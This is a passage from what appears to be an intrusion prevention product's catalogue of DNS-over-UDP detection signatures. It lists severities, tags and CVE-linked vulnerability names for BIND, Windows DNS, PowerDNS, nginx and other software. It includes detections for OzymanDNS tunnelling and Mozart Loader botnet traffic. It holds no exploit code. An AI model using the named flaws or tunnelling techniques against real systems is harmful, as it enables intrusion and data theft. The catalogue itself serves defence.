Context: DNS UDP Client Message
Severity: 7
Tags: Any Operating System, Any Hardware, ISC BIND, CVE2017, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-859-5242
Last changed: sgpkg-ips-859-5242
Vulnerability: ISC-BIND-DNS64-And-RPZ-Query-Processing-Denial-Of-Service
Description:
Back to top

DNS-UDP_ISC-BIND-DNSSEC-Key-Parsing-Buffer.c-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in ISC BIND detected
Context: DNS UDP Server Message
Severity: 7
Tags: Any Operating System, Any Hardware, ISC BIND, CVE2015, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-690-5211
Last changed: sgpkg-ips-690-5211
Vulnerability: ISC-BIND-DNSSEC-Key-Parsing-Buffer.c-Denial-Of-Service
Description:
Back to top

DNS-UDP_ISC-BIND-DNSSEC-Validation-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in ISC BIND detected
Context: DNS UDP Server Message
Severity: 7
Tags: Any Operating System, Any Hardware, BIND, CVE2015, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-677-5211
Last changed: sgpkg-ips-677-5211
Vulnerability: ISC-BIND-DNSSEC-Validation-Denial-Of-Service
Description:
Back to top

DNS-UDP_ISC-BIND-DNSSEC-Validation-Multiple-RRsets-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in ISC BIND detected
Context: DNS UDP Server Message
Severity: 7
Tags: Any Operating System, Any Hardware, BIND, CVE2007, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-626-5211
Last changed: sgpkg-ips-626-5211
Vulnerability: ISC-BIND-DNSSEC-Validation-Multiple-RRsets-Denial-Of-Service
Description:
Back to top

DNS-UDP_ISC-BIND-Dynamic-Update-Request-Denial-Of-Service

About this situation: Attempt to exploit a denial of service vulnerability in ISC BIND 9 over udp detected
Context: DNS UDP Client Message
Severity: 2
Tags: Any Operating System, Any Hardware, BIND, CVE2009, Any Operating System not specific, Potential Denial of Service
First detected in: sgpkg-ips-236-3038
Last changed: sgpkg-ips-236-3038
Vulnerability: ISC-BIND-Dynamic-Update-Request-Denial-Of-Service
Description:
Back to top

DNS-UDP_ISC-BIND-Dynamic-Update-Request-Denial-Of-Service-Exploit

About this situation: Denial of service exploit against ISC BIND 9 over udp detected
Context: DNS UDP Client Message
Severity: 7
Tags: Any Operating System, Any Hardware, BIND, CVE2009, Any Operating System not specific, Denial of Service, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-236-3038
Last changed: sgpkg-ips-236-3038
Vulnerability: ISC-BIND-Dynamic-Update-Request-Denial-Of-Service
Description:
Back to top

DNS-UDP_ISC-Bind-Edns-Option-Processing-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in ISC BIND detected
Context: DNS UDP Server Message
Severity: 7
Tags: Any Operating System, Any Hardware, BIND, CVE2014, Any Operating System not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-595-5211
Vulnerability: ISC-Bind-Edns-Option-Processing-Denial-Of-Service
Description:
Back to top

DNS-UDP_ISC-Bind-Lwresd-Query-Name-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in ISC BIND detected
Context: DNS UDP Client Message
Severity: 7
Tags: Any Operating System, Any Hardware, ISC BIND, CVE2016, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-784-5211
Last changed: sgpkg-ips-784-5211
Vulnerability: ISC-Bind-Lwresd-Query-Name-Denial-Of-Service
Description:
Back to top

DNS-UDP_Isc-Bind-Openpgpkey61c-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in ISC BIND detected
Context: DNS UDP Client Message
Severity: 7
Tags: Any Operating System, Any Hardware, ISC BIND, CVE2015, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-694-5211
Vulnerability: Isc-Bind-Openpgpkey61c-Denial-Of-Service
Description:
Back to top

DNS-UDP_ISC-Bind-Query-Response-Missing-RRSIG-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in ISC BIND detected
Context: DNS UDP Server Message
Severity: 7
Tags: Any Operating System, Any Hardware, ISC BIND, CVE2016, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-857-5242
Last changed: sgpkg-ips-862-5242
Vulnerability: ISC-Bind-Query-Response-Missing-RRSIG-Denial-Of-Service
Description:
Back to top

DNS-UDP_ISC-BIND-Query_addsoa-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Internet Systems Consortium (ISC) BIND detected
Context: DNS UDP Server Message
Severity: 7
Tags: Any Operating System, Any Hardware, BIND, CVE2007, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-626-5211
Last changed: sgpkg-ips-629-5211
Vulnerability: ISC-BIND-Query_addsoa-Denial-Of-Service
Description:
Back to top

DNS-UDP_ISC-Bind-Rdata-Handling-Assertion-Failure-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in ISC BIND detected
Context: DNS UDP Server Message
Severity: 7
Tags: Any Operating System, Any Hardware, BIND, CVE2013, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-736-5211
Last changed: sgpkg-ips-736-5211
Vulnerability: ISC-Bind-Rdata-Handling-Assertion-Failure-Denial-Of-Service
Description:
Back to top

DNS-UDP_Isc-Bind-Regular-Expression-Handling-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in ISC BIND detected
Context: DNS UDP Server Message
Severity: 7
Tags: Any Operating System, Any Hardware, BIND, CVE2013, Any Operating System not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-597-5211
Last changed: sgpkg-ips-597-5211
Vulnerability: Isc-Bind-Regular-Expression-Handling-Denial-Of-Service
Description:
Back to top

DNS-UDP_ISC-Bind-RRSIG-Record-Response-Assertion-Failure-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in ISC BIND detected
Context: DNS UDP Server Message
Severity: 7
Tags: Any Operating System, Any Hardware, ISC BIND, CVE2016, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-851-5242
Last changed: sgpkg-ips-851-5242
Vulnerability: ISC-Bind-RRSIG-Record-Response-Assertion-Failure-Denial-Of-Service
Description:
Back to top

DNS-UDP_ISC-BIND-TKEY-Queries-Input-Validation-DoS

About this situation: A name server denial of service query
Context: DNS UDP Client Message
Severity: 2
Tags: Any Operating System, Any Hardware, BIND, CVE2015, Any Operating System not specific, Potential Denial of Service
First detected in: sgpkg-ips-667-5211
Last changed: sgpkg-ips-670-5211
Vulnerability: ISC-BIND-TKEY-Queries-Input-Validation-DoS
Description:
Back to top

DNS-UDP_ISC-BIND-TKEY-Queries-Input-Validation-DoS-2

About this situation: A name server denial of service query
Context: DNS UDP Client Message
Severity: 7
Tags: Any Operating System, Any Hardware, BIND, CVE2015, Any Operating System not specific, Suspected Denial of Service, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-669-5211
Last changed: sgpkg-ips-669-5211
Vulnerability: ISC-BIND-TKEY-Queries-Input-Validation-DoS
Description:
Back to top

DNS-UDP_ISC-Bind-Tsig-Truncation-Denial-Of-Service-1

About this situation: An attempt to exploit a vulnerability in ISC BIND detected
Context: DNS UDP Client Message
Severity: 7
Tags: Any Operating System, Any Hardware, ISC BIND, CVE2020, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1314-5242
Last changed: sgpkg-ips-1618-5242
Vulnerability: ISC-BIND-Truncated-Tsig-Record
Description:
Back to top

DNS-UDP_ISC-Bind-Tsig-Truncation-Denial-Of-Service-2

About this situation: An attempt to exploit a vulnerability in ISC BIND detected
Context: DNS UDP Server Message
Severity: 7
Tags: Any Operating System, Any Hardware, ISC BIND, CVE2020, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1314-5242
Last changed: sgpkg-ips-1315-5242
Vulnerability: ISC-BIND-Truncated-Tsig-Record
Description:
Back to top

DNS-UDP_ISC-Bind-Tsig-Validation-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in ISC BIND detected
Context: DNS UDP Client Message
Severity: 7
Tags: Any Operating System, Any Hardware, ISC BIND, CVE2020, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1253-5242
Last changed: sgpkg-ips-1408-5242
Vulnerability: ISC-Bind-Tsig-Validation-Denial-Of-Service
Description:
Back to top

DNS-UDP_ISC-BIND-Zero-Length-Rdata-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in ISC BIND detected
Context: DNS UDP Server Message
Severity: 7
Tags: Any Operating System, Any Hardware, BIND, CVE2012, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-847-5242
Last changed: sgpkg-ips-847-5242
Vulnerability: ISC-BIND-Zero-Length-Rdata-Denial-Of-Service
Description:
Back to top

DNS-UDP_Libspf2-Macro-Expansion-Integer-Underflow

About this situation: An attempt to exploit a vulnerability in libspf2 detected
Context: DNS UDP Server Message
Severity: 7
Tags: Any Operating System, Any Hardware, libspf2, CVE2023, Any Operating System not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1716-5242
Last changed: sgpkg-ips-1716-5242
Vulnerability: Libspf2-Macro-Expansion-Integer-Underflow
Description:
Back to top

DNS-UDP_Localhost-Address-Resolved

About this situation: DNS query reply with a localhost address resolve detected
Context: DNS UDP Server Message
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Possibly Unwanted Content, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-613-5211
Last changed: sgpkg-ips-1188-5242
Description:
Back to top

DNS-UDP_Long-Domain-Name-With-Mixed-Letters-And-Digits

About this situation: A DNS request containing a long domain name with mixed letters and digits detected
Context: DNS UDP Client Message
Severity: 1
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Protocol Information
First detected in: sgpkg-ips-1658-5242
Last changed: sgpkg-ips-1658-5242
Vulnerability: Long-Domain-Name-With-Mixed-Letters-And-Digits
Description:
Back to top

DNS-UDP_Message-Parser

About this situation: Parser support for DNS messages in UDP contexts
Context: ANY Common Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-1390-5242
Last changed: sgpkg-ips-1658-5242
Description:
Back to top

DNS-UDP_Microsoft-DNS-Server-Any-Query-Cache-Weakness

About this situation: A Microsoft DNS Server ANY Query Cache Weakness vulnerability
Context: DNS UDP Client Message
Severity: 7
Tags: Windows, Any Hardware, Windows Server, CVE2009, Windows not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1008-5242
Last changed: sgpkg-ips-1008-5242
Vulnerability: Microsoft-DNS-Server-Any-Query-Cache-Weakness
Description:
Back to top

DNS-UDP_Microsoft-DNS-Server-Denial-of-Service

About this situation: A Microsoft DNS Server Denial of Service vulnerability
Context: DNS UDP Client Message
Severity: 7
Tags: Windows, Any Hardware, Windows Server, CVE2012, Windows not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1008-5242
Last changed: sgpkg-ips-1008-5242
Vulnerability: Microsoft-DNS-Server-Denial-of-Service
Description:
Back to top

DNS-UDP_Microsoft-DNS-Server-Denial-of-Service-2

About this situation: A Microsoft DNS Server Denial of Service vulnerability
Context: DNS UDP Client Message
Severity: 7
Tags: Windows, Any Hardware, Windows Server, CVE2012, Windows not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1035-5242
Last changed: sgpkg-ips-1035-5242
Vulnerability: Microsoft-DNS-Server-Denial-of-Service
Description:
Back to top

DNS-UDP_Microsoft-Windows-DNS-Client-Buffer-Overrun-2

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: DNS UDP Server Message
Severity: 7
Tags: Windows, Any Hardware, MS2006-08, CVE2006, Windows not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-415-4219
Vulnerability: Microsoft-Windows-DNS-Client-Buffer-Overrun
Description:
Back to top

DNS-UDP_Microsoft-Windows-DNS-Client-Service-CVE-2011-0657

About this situation: An attempt to exploit a vulnerability in Microsoft Windows
Context: DNS UDP Client Message
Severity: 7
Tags: Windows XP, Windows 2003, Windows Vista, Windows 7, Windows 2008 R2, Windows 2008, Any Hardware, MS2011-04, CVE2011, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1150-5242
Last changed: sgpkg-ips-1150-5242
Vulnerability: Microsoft-Windows-DNS-Client-Service-CVE-2011-0657
Description:
Back to top

DNS-UDP_Microsoft-Windows-DNS-Insufficient-Socket-Entropy-Vulnerability

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: DNS UDP Client Message
Severity: 7
Tags: Windows, Any Hardware, MS2008-07, CVE2008, Windows not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Microsoft-Windows-DNS-Insufficient-Socket-Entropy-Vulnerability
Description:
Back to top

DNS-UDP_Microsoft-Windows-DNS-Server-Spoofing-Vulnerability

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: DNS UDP Server Message
Severity: 7
Tags: Windows, Any Hardware, MS2007-11, CVE2007, Windows not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Microsoft-Windows-DNS-Server-Spoofing-Vulnerability
Description:
Back to top

DNS-UDP_Microsoft-Windows-DNS-Server-Spoofing-Vulnerability-2

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: DNS UDP Client Message
Severity: 7
Tags: Windows, Any Hardware, MS2007-11, CVE2007, Windows not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1150-5242
Last changed: sgpkg-ips-1150-5242
Vulnerability: Microsoft-Windows-DNS-Server-Spoofing-Vulnerability
Description:
Back to top

DNS-UDP_Microsoft-Windows-Dnsapi-NSEC3-Heap-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: DNS UDP Server Message
Severity: 7
Tags: Windows, Any Hardware, CVE2017, Windows not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1005-5242
Last changed: sgpkg-ips-1005-5242
Vulnerability: Microsoft-Windows-Dnsapi-NSEC3-Heap-Based-Buffer-Overflow
Description:
Back to top

DNS-UDP_Microsoft-Windows-NAT-Helper-DNS-Query-Denial-Of-Service

About this situation: Detects denial of service exploits against Microsoft Windows XP
Context: DNS UDP Client Message
Severity: 2
Tags: Windows XP, x86, CVE2006, Windows XP not specific, Potential Denial of Service
First detected in: sgpkg-ips-84-1314
Last changed: sgpkg-ips-354-4219
Vulnerability: Microsoft-Windows-NAT-Helper-DNS-Query-Denial-Of-Service
Description:
Back to top

DNS-UDP_Microsoft-Windows-SMTP-Service-DNS-Response-Spoofing

About this situation: An attempt to exploit a vulnerability in Microsoft Exchange Server detected
Context: DNS UDP Server Message
Severity: 7
Tags: Windows, Any Hardware, MS2010-04, CVE2010, Windows not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Microsoft-Windows-SMTP-Service-DNS-Response-Spoofing
Description:
Back to top

DNS-UDP_Microsoft-Windows-SMTP-Service-DNS-Response-Spoofing-2

About this situation: An attempt to exploit a vulnerability in Microsoft Exchange Server detected
Context: DNS UDP Server Message
Severity: 7
Tags: Windows, Any Hardware, MS2010-04, CVE2010, Windows not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1035-5242
Last changed: sgpkg-ips-1035-5242
Vulnerability: Microsoft-Windows-SMTP-Service-DNS-Response-Spoofing
Description:
Back to top

DNS-UDP_Microsoft-Windows-SMTP-Service-MX-Record-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Windows SMTP service detected
Context: DNS UDP Server Message
Severity: 7
Tags: Windows XP, Windows 2000, Windows 2003, Windows 2008, Any Hardware, Exchange Server 2003, Exchange Server 2000, MS2010-04, CVE2010, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-394-4219
Last changed: sgpkg-ips-394-4219
Vulnerability: Microsoft-Windows-SMTP-Service-MX-Record-Denial-Of-Service
Description:
Back to top

DNS-UDP_Microsoft-Windows2k8-NAPTR-RCE

About this situation: A DNS reply with a NAPTR answer containing long fields was detected
Context: DNS UDP Server Message
Severity: 7
Tags: Windows 2008 R2, Windows 2008, Any Hardware, MS2011-08, CVE2011, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-406-4219
Last changed: sgpkg-ips-406-4219
Vulnerability: DNS-NAPTR-Potential-Remote-Code-Execution
Description:
Back to top

DNS-UDP_Mozart-Loader-Traffic

About this situation: Mozart Loader traffic was detected
Context: DNS UDP Client Message
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1237-5242
Last changed: sgpkg-ips-1355-5242
Vulnerability: Mozart-Loader-Traffic
Description:
Back to top

DNS-UDP_MS-Forefront-Threat-Management-Gateway-Client-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Forefront Threat Management Gateway Client detected
Context: DNS UDP Server Message
Severity: 7
Tags: Windows, Any Hardware, Microsoft Forefront Threat Management Gateway Client, MS2011-06, CVE2011, Windows not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1008-5242
Last changed: sgpkg-ips-1008-5242
Vulnerability: MS-Forefront-Threat-Management-Gateway-Client-Remote-Code-Execution
Description:
Back to top

DNS-UDP_Multiple-Vendors-DNS-NSEC3-Response-Handling-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in ISC BIND detected
Context: DNS UDP Server Message
Severity: 2
Tags: Any Operating System, Any Hardware, ISC BIND, CVE2023, Any Operating System not specific, Potential Denial of Service
First detected in: sgpkg-ips-1728-5242
Last changed: sgpkg-ips-1728-5242
Vulnerability: Multiple-Vendors-DNS-NSEC3-Response-Handling-Denial-Of-Service
Description:
Back to top

DNS-UDP_Multiple-Vendors-DNS-Txt-Record-Parsing-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability related to DNS Txt Record detected
Context: DNS UDP Server Message
Severity: 7
Tags: Any Operating System, Any Hardware, PHP, libspf2, CVE2008, CVE2014, Any Operating System not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-377-4219
Last changed: sgpkg-ips-640-5211
Vulnerability: Multiple-Vendors-Libspf2-DNS-Txt-Record-Parsing-Buffer-Overflow
Php-Php_parserr-DNS-Txt-Heap-Buffer-Overflow
Description:
Back to top

DNS-UDP_Nameserver-Version-Query

About this situation: A name server version query has been detected
Context: DNS UDP Client Message
Severity: 2
Tags: Any Operating System, Any Hardware, BIND, Any Operating System not specific, Potential Disclosure
First detected in: sgpkg-ips-7-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: BIND-Version-Query
Description:
Back to top

DNS-UDP_Nginx-DNS-Resolver-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in nginx HTTP Server detected
Context: DNS UDP Server Message
Severity: 7
Tags: Any Operating System, Any Hardware, nginx, CVE2016, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-729-5211
Last changed: sgpkg-ips-729-5211
Vulnerability: Nginx-DNS-Resolver-Denial-Of-Service
Description:
Back to top

DNS-UDP_Nginx-DNS-Resolver-Off-By-One-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Nginx DNS Resolver detected.
Context: DNS UDP Server Message
Severity: 7
Tags: Any Operating System, Any Hardware, nginx, CVE2021, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1370-5242
Last changed: sgpkg-ips-1370-5242
Vulnerability: Nginx-DNS-Resolver-Off-By-One-Heap-Buffer-Overflow
Description:
Back to top

DNS-UDP_NLnet-Labs-Unbound-Notify-Queries-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in NLnet Labs Unbound detected
Context: DNS UDP Client Message
Severity: 7
Tags: Any Operating System, Any Hardware, NLnet Unbound, CVE2019, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1462-5242
Last changed: sgpkg-ips-1462-5242
Vulnerability: NLnet-Labs-Unbound-Notify-Queries-Denial-Of-Service
Description:
Back to top

DNS-UDP_NSEC3-Invalid-Field-Length

About this situation: An invalid field length was detected in an NSEC3 record
Context: DNS UDP Server Message
Severity: 7
Tags: Windows, Any Hardware, MS2017-10, CVE2017, Windows not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-998-5242
Last changed: sgpkg-ips-998-5242
Vulnerability: NSEC3-Invalid-Response-Heap-Corruption
Description:
Back to top

DNS-UDP_Oracle-Secure-Backup-observiced.exe-Buffer-Overflow

About this situation: An Oracle Secure Backup observiced.exe Buffer Overflow vulnerability
Context: DNS UDP Server Message
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Secure Backup, CVE2010, Any Operating System not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1008-5242
Last changed: sgpkg-ips-1008-5242
Vulnerability: Oracle-Secure-Backup-observiced.exe-Buffer-Overflow
Description:
Back to top

DNS-UDP_Out-Of-State-DNS-Response-With-Additional-Record

About this situation: Out of state DNS response with one or more additional records
Context: DNS UDP Client Message
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections
First detected in: sgpkg-ips-1158-5242
Last changed: sgpkg-ips-1158-5242
Vulnerability: DNS-Out-Of-State-DNS-Response-With-Additional-Record
Description:
Back to top

DNS-UDP_OzymanDNS-Tunnel-Request

About this situation: Attempt to tunnel traffic over DNS detected
Context: DNS UDP Client Message
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-513-5211
Last changed: sgpkg-ips-513-5211
Vulnerability: OzymanDNS-Tunnel
Description:
Back to top

DNS-UDP_OzymanDNS-Tunnel-Response

About this situation: Attempt to tunnel traffic over DNS detected
Context: DNS UDP Server Message
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-513-5211
Last changed: sgpkg-ips-513-5211
Vulnerability: OzymanDNS-Tunnel
Description:
Back to top

DNS-UDP_Php-DNS_Get_Record-Out-Of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in PHP detected
Context: DNS UDP Server Message
Severity: 7
Tags: Any Operating System, Any Hardware, PHP, CVE2019, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1142-5242
Last changed: sgpkg-ips-1142-5242
Vulnerability: Php-DNS_Get_Record-Out-Of-Bounds-Read
Description:
Back to top

DNS-UDP_PowerDNS-Authoritative-Server-CVE-2021-36754-DoS

About this situation: An attempt to exploit a vulnerability in PowerDNS Authoritative Server detected.
Context: DNS UDP Client Message
Severity: 7
Tags: Unix, Linux, Any Hardware, PowerDNS Authoritative Server, CVE2021, Unix not specific, Linux not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1391-5242
Last changed: sgpkg-ips-1431-5242
Vulnerability: PowerDNS-Authoritative-Server-CVE-2021-36754-DoS
Description:
Back to top

DNS-UDP_PowerDNS-Authoritative-Server-Dot-Character-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in PowerDNS PowerDNS Authoritative Server detected
Context: DNS UDP Client Message
Severity: 7
Tags: Any Operating System, Any Hardware, PowerDNS Authoritative Server, CVE2016, Any Operating System not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-809-5242
Last changed: sgpkg-ips-811-5242
Vulnerability: PowerDNS-Authoritative-Server-Dot-Character-Denial-Of-Service
Description:
Back to top

DNS-UDP_PowerDNS-Authoritative-Server-Packet-Processing-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in PowerDNS PowerDNS Authoritative Server detected
Context: DNS UDP Client Message
Severity: 7
Tags: Any Operating System, Any Hardware, PowerDNS Authoritative Server, CVE2015, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-710-5211
Last changed: sgpkg-ips-710-5211
Vulnerability: PowerDNS-Authoritative-Server-DNS-Packet-Processing-Denial-Of-Service
Description:
Back to top

DNS-UDP_PowerDNS-Nameserver-Label-Decompression-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in PowerDNS Recursor detected
Context: DNS UDP Client Message
Severity: 7
Tags: Any Operating System, Any Hardware, PowerDNS Recursor, PowerDNS Authoritative Server, CVE2015, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-648-5211
Last changed: sgpkg-ips-648-5211
Vulnerability: PowerDNS-Nameserver-Label-Decompression-Denial-Of-Service
Description:
Back to top

DNS-UDP_PowerDNS-Recursor-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in PowerDNS PowerDNS Recursor detected
Context: DNS UDP Client Message
Severity: 7
Tags: Any Operating System, Any Hardware, PowerDNS, CVE2014, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-613-5211
Last changed: sgpkg-ips-613-5211
Vulnerability: PowerDNS-Recursor-Denial-Of-Service
Description:
Back to top

DNS-UDP_Private-Address-Resolved

About this situation: DNS query reply with a private address resolve detected
Context: DNS UDP Server Message
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Possibly Unwanted Content, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1188-5242
Last changed: sgpkg-ips-1188-5242
Description:
Back to top

DNS-UDP_Red-Hat-Enterprise-Linux-DNS-Resolver-Buffer-Overflow

About this situation: A DNS reply with a large number of answer RRs was detected
Context: DNS UDP Server Message
Severity: 7
Tags: Red Hat Enterprise Linux, Red Hat Linux, Any Hardware, CVE2002, Red Hat Enterprise Linux not specific, Red Hat Linux not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-626-5211
Last changed: sgpkg-ips-626-5211
Vulnerability: Red-Hat-Enterprise-Linux-DNS-Resolver-Buffer-Overflow
Description:
Back to top

DNS-UDP_Reply-Type-Null

About this situation: DNS reply with type NULL detected
Context: DNS UDP Server Message
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-1076-5242
Last changed: sgpkg-ips-1076-5242
Description:
Back to top

DNS-UDP_Samba-DNS-Reply-Flag-Denial-Of-Service

About this situation: A vulnerability in Samba Team Samba
Context: DNS UDP Server Message
Severity: 7
Tags: Any Operating System, Any Hardware, Samba, CVE2014, Any Operating System not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1008-5242
Last changed: sgpkg-ips-1008-5242
Vulnerability: Samba-DNS-Reply-Flag-Denial-Of-Service
Description:
Back to top

DNS-UDP_Spotify-Server-Query

About this situation: Detects attempts to request Spotify server addresses
Context: DNS UDP Client Message
Severity: 2
